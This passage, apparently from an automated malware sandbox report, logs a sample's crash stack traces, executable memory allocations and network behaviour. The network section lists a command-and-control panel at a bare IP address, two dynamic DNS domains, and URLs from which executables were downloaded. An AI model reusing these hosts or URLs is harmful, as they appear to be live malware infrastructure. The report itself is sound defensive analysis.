__exception__ June 21, 2021, 12:58 p.m.	stacktrace: 0x91929e 0x918799 0x918329 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x910234 0x9100b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 d2 1d 54 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x91930b registers.esp: 4055300 registers.edi: 4055320 registers.eax: 0 registers.ebp: 4055332 registers.edx: 37098024 registers.ebx: 4055632 registers.esi: 37098024 registers.ecx: 0	1
__exception__ June 21, 2021, 12:58 p.m.	stacktrace: 0x9192b0 0x918799 0x918329 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8 CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2 LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63 CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998 CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x6fbfb726 CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x6fbfbf68 CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x6fbfbce4 DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x6fbbcca4 DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x6fbbcd37 DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x6fca8841 LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x6fc214e9 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x910234 0x9100b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 d2 1d 54 6e c7 45 e8 00 00 00 00 c7 45 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x91930b registers.esp: 4055300 registers.edi: 4055320 registers.eax: 0 registers.ebp: 4055332 registers.edx: 45555552 registers.ebx: 4055632 registers.esi: 45555552 registers.ecx: 0	1
__exception__ June 21, 2021, 12:58 p.m.	stacktrace: 0x91e9e4 0x91df17 0x91953f DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d3711 @ 0x6eeb3711 mscorlib+0x308f2d @ 0x6eee8f2d mscorlib+0x2cb060 @ 0x6eeab060 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x6fc21838 LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x6fc21737 mscorlib+0x2d36ad @ 0x6eeb36ad mscorlib+0x308f2d @ 0x6eee8f2d microsoft+0x50c17 @ 0x72050c17 microsoft+0x3f33f @ 0x7203f33f microsoft+0x3edf8 @ 0x7203edf8 microsoft+0x3e3b9 @ 0x7203e3b9 0x910234 0x9100b2 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fbb2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fc674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fc67610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fcf1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fcf1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fcf1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fcf416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7443f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x744b7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x744b4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 0f bf 01 eb 31 8d 55 e0 0f b6 01 88 02 0f b6 41 exception.instruction: movsx eax, word ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: mscorlib+0x305ad2 exception.address: 0x6eee5ad2 registers.esp: 4057604 registers.edi: 4057628 registers.eax: 0 registers.ebp: 4057640 registers.edx: 0 registers.ebx: 45884100 registers.esi: 8392694 registers.ecx: 8392694	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (7 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-08D4450EE4EB09C734C93A8E8E91A909.html
suspicious_features	GET method with no useragent header	suspicious_request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59CA53825A30DDA8641228CFB3A1898A.html
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://46.102.106.151/panel/index.php
suspicious_features	GET method with no useragent header	suspicious_request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C311B505088D4AC5F97AC7A0C3EA6538.html
suspicious_features	GET method with no useragent header	suspicious_request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C1900454F8C1F17DAFA268D4AC67120F.html
suspicious_features	GET method with no useragent header	suspicious_request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B8A00046C7A941058E012A87473EB342.html
suspicious_features	GET method with no useragent header	suspicious_request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-153E31DBDD1ACDF382491ECDBE37689C.html

Connects to a Dynamic DNS Domain (2 events)

domain	dontreachme3.ddns.net
domain	dontreachme.duckdns.org

Performs some HTTP requests (9 events)

request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-08D4450EE4EB09C734C93A8E8E91A909.html
request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59CA53825A30DDA8641228CFB3A1898A.html
request	POST http://46.102.106.151/panel/index.php
request	GET http://ni2748194-1.web16.nitrado.hosting/HostStartups.exe
request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C311B505088D4AC5F97AC7A0C3EA6538.html
request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C1900454F8C1F17DAFA268D4AC67120F.html
request	GET http://ni2748194-1.web16.nitrado.hosting/Server.exe
request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B8A00046C7A941058E012A87473EB342.html
request	GET http://apdocroto.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-153E31DBDD1ACDF382491ECDBE37689C.html

Sends data using the HTTP POST Method (1 event)

request

POST http://46.102.106.151/panel/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 7244 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00750000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba1000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba2000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ba0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00412000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00436000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00437000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0042a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00621000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00623000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00624000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00626000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:56 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00627000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff20000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00628000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00629000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0062a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0062b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0062c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fffff process_handle: 0xffffffff		3221225496
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1	0
